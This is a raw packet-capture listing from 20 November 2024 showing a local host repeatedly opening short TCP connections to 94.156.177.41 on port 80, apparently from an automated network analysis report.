                                                                                                                              Nov 20, 2024 10:57:46.767010927 CET5850580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:46.774162054 CET805850594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:46.774216890 CET5850580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:46.782445908 CET805850594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:47.563374043 CET805850594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:47.563508034 CET805850594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:47.563623905 CET5850580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:47.563782930 CET5850580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:47.570859909 CET805850594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:47.711721897 CET5850680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:47.719166040 CET805850694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:47.719258070 CET5850680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:47.721282005 CET5850680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:47.730437994 CET805850694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:47.730504036 CET5850680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:47.739742994 CET805850694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:48.461930990 CET805850694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:48.462037086 CET5850680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:48.462044954 CET805850694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:48.462116003 CET5850680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:48.467330933 CET805850694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:48.599814892 CET5850780192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:48.607561111 CET805850794.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:48.607665062 CET5850780192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:48.609719992 CET5850780192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:48.614615917 CET805850794.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:48.614778996 CET5850780192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:48.620059013 CET805850794.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:49.351393938 CET805850794.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:49.351413012 CET805850794.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:49.351506948 CET5850780192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:49.354686022 CET5850780192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:49.360364914 CET805850794.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:49.503146887 CET5850880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:49.511392117 CET805850894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:49.511498928 CET5850880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:49.513509989 CET5850880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:49.520217896 CET805850894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:49.520288944 CET5850880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:49.527167082 CET805850894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:50.260884047 CET805850894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:50.261043072 CET5850880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:50.261085987 CET805850894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:50.261229038 CET5850880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:50.268579006 CET805850894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:50.436767101 CET5850980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:50.441695929 CET805850994.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:50.441800117 CET5850980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:50.443767071 CET5850980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:50.448642015 CET805850994.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:50.448704004 CET5850980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:50.453615904 CET805850994.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:51.211325884 CET805850994.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:51.211389065 CET805850994.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:51.211483002 CET5850980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:51.214713097 CET5850980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:51.219567060 CET805850994.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:51.366425037 CET5851080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:51.371682882 CET805851094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:51.371751070 CET5851080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:51.373881102 CET5851080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:51.378976107 CET805851094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:51.379034996 CET5851080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:51.383846045 CET805851094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:52.132011890 CET805851094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:52.132030010 CET805851094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:52.132108927 CET5851080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:52.132249117 CET5851080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:52.140913963 CET805851094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:52.266629934 CET5851180192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:52.273770094 CET805851194.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:52.273859978 CET5851180192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:52.275599957 CET5851180192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:52.282552958 CET805851194.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:52.282630920 CET5851180192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:52.289645910 CET805851194.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:53.044281960 CET805851194.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:53.044296980 CET805851194.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:53.044496059 CET5851180192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:53.044496059 CET5851180192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:53.049334049 CET805851194.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:53.189101934 CET5851280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:53.194340944 CET805851294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:53.194430113 CET5851280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:53.196384907 CET5851280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:53.201576948 CET805851294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:53.201630116 CET5851280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:53.206649065 CET805851294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:53.951361895 CET805851294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:53.951456070 CET5851280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:53.951647043 CET805851294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:53.951694965 CET5851280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:53.956363916 CET805851294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:54.096692085 CET5851380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:54.101732016 CET805851394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:54.101820946 CET5851380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:54.103605032 CET5851380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:54.109302998 CET805851394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:54.109455109 CET5851380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:54.114999056 CET805851394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:54.872958899 CET805851394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:54.873018980 CET805851394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:54.873080969 CET5851380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:54.873080969 CET5851380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:54.880536079 CET805851394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:55.019460917 CET5851480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:55.026335001 CET805851494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:55.026413918 CET5851480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:55.028426886 CET5851480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:55.033361912 CET805851494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:55.033418894 CET5851480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:55.038345098 CET805851494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:55.757050991 CET805851494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:55.757066965 CET805851494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:55.757237911 CET5851480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:55.757237911 CET5851480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:55.762200117 CET805851494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:55.906955004 CET5851580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:56.032571077 CET805851594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:56.032777071 CET5851580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:56.034521103 CET5851580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:56.039462090 CET805851594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:56.039529085 CET5851580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:56.044425011 CET805851594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:56.796859026 CET805851594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:56.796874046 CET805851594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:56.797066927 CET5851580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:56.797068119 CET5851580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:56.804995060 CET805851594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:56.943567991 CET5851680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:56.948486090 CET805851694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:56.948596954 CET5851680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:56.950526953 CET5851680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:56.955427885 CET805851694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:56.955480099 CET5851680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:56.960361004 CET805851694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:57.812340021 CET805851694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:57.812611103 CET5851680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:57.812985897 CET805851694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:57.813035965 CET5851680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:57.817445993 CET805851694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:57.968700886 CET5851880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:57.977046967 CET805851894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:57.977235079 CET5851880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:57.979212999 CET5851880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:57.984013081 CET805851894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:57.984069109 CET5851880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:57.988939047 CET805851894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:58.732697964 CET805851894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:58.732713938 CET805851894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:58.732769012 CET5851880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:58.732819080 CET5851880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:58.738049030 CET805851894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:58.876892090 CET5852480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:58.882597923 CET805852494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:58.882788897 CET5852480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:58.884505033 CET5852480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:58.889535904 CET805852494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:58.889595985 CET5852480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:58.894628048 CET805852494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:59.631649971 CET805852494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:59.631668091 CET805852494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:59.631769896 CET5852480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:59.631850004 CET5852480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:59.636684895 CET805852494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:59.776001930 CET5853080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:59.780862093 CET805853094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:59.780939102 CET5853080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:59.782968998 CET5853080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:59.787826061 CET805853094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:59.787877083 CET5853080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:59.797323942 CET805853094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:00.539496899 CET805853094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:00.539640903 CET5853080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:00.539813995 CET805853094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:00.539869070 CET5853080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:00.545759916 CET805853094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:00.675981045 CET5853680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:00.680928946 CET805853694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:00.684600115 CET5853680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:00.686570883 CET5853680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:00.691399097 CET805853694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:00.691488981 CET5853680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:00.696300983 CET805853694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:01.430891037 CET805853694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:01.430906057 CET805853694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:01.431288004 CET5853680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:01.431288004 CET5853680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:01.438503027 CET805853694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:01.567682028 CET5854380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:01.574132919 CET805854394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:01.574197054 CET5854380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:01.576360941 CET5854380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:01.582573891 CET805854394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:01.582640886 CET5854380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:01.589910030 CET805854394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:02.329118013 CET805854394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:02.329549074 CET805854394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:02.329621077 CET5854380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:02.343796015 CET5854380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:02.348680973 CET805854394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:02.590184927 CET5855380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:02.600543976 CET805855394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:02.604665995 CET5855380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:02.613675117 CET5855380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:02.622912884 CET805855394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:02.624665022 CET5855380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:02.629683971 CET805855394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:03.353976011 CET805855394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:03.354048967 CET805855394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:03.354105949 CET5855380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:03.354106903 CET5855380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:03.364160061 CET805855394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:03.501194954 CET5855980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:03.509105921 CET805855994.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:03.509408951 CET5855980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:03.511341095 CET5855980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:03.519149065 CET805855994.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:03.519337893 CET5855980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:03.524365902 CET805855994.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:04.399334908 CET805855994.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:04.399352074 CET805855994.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:04.399421930 CET5855980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:04.399496078 CET5855980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:04.406032085 CET805855994.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:04.533153057 CET5856580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:04.538120985 CET805856594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:04.538213968 CET5856580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:04.539978981 CET5856580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:04.544979095 CET805856594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:04.545049906 CET5856580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:04.549925089 CET805856594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:05.306345940 CET805856594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:05.306459904 CET5856580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:05.306499958 CET805856594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:05.306552887 CET5856580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:05.314152002 CET805856594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:05.442004919 CET5857280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:05.447024107 CET805857294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:05.447101116 CET5857280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:05.449069023 CET5857280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:05.453937054 CET805857294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:05.453999043 CET5857280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:05.461836100 CET805857294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:06.207166910 CET805857294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:06.207180023 CET805857294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:06.207266092 CET5857280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:06.207374096 CET5857280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:06.214440107 CET805857294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:06.350982904 CET5858280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:06.358406067 CET805858294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:06.358509064 CET5858280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:06.360265970 CET5858280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:06.367758036 CET805858294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:06.367844105 CET5858280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:06.373209953 CET805858294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:07.123575926 CET805858294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:07.123684883 CET5858280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:07.123737097 CET805858294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:07.123780012 CET5858280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:07.131818056 CET805858294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:07.267256975 CET5858880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:07.276088953 CET805858894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:07.276226997 CET5858880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:07.278301001 CET5858880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:07.286922932 CET805858894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:07.287005901 CET5858880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:07.291914940 CET805858894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:08.022133112 CET805858894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:08.022254944 CET805858894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:08.022325993 CET5858880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:08.022325993 CET5858880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:08.029885054 CET805858894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:08.160388947 CET5859480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:08.168382883 CET805859494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:08.168483019 CET5859480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:08.170245886 CET5859480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:08.175976992 CET805859494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:08.176054001 CET5859480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:08.181195021 CET805859494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:08.911760092 CET805859494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:08.911815882 CET805859494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:08.911859989 CET5859480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:08.911911011 CET5859480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:08.916984081 CET805859494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:09.050929070 CET5860080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:09.057393074 CET805860094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:09.057501078 CET5860080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:09.059215069 CET5860080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:09.065776110 CET805860094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:09.065860033 CET5860080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:09.072288990 CET805860094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:09.796715021 CET805860094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:09.796821117 CET5860080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:09.796991110 CET805860094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:09.797039032 CET5860080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:09.804163933 CET805860094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:09.945609093 CET5860680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:09.952558041 CET805860694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:09.952723980 CET5860680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:09.954740047 CET5860680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:09.959579945 CET805860694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:09.959629059 CET5860680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:09.964580059 CET805860694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:10.692233086 CET805860694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:10.692364931 CET5860680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:10.692384958 CET805860694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:10.692442894 CET5860680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:10.701297998 CET805860694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:10.831062078 CET5861380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:10.836103916 CET805861394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:10.836179972 CET5861380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:10.838181019 CET5861380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:10.847428083 CET805861394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:10.847502947 CET5861380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:10.856168032 CET805861394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:11.593069077 CET805861394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:11.593080997 CET805861394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:11.593142986 CET5861380192.168.2.494.156.177.41
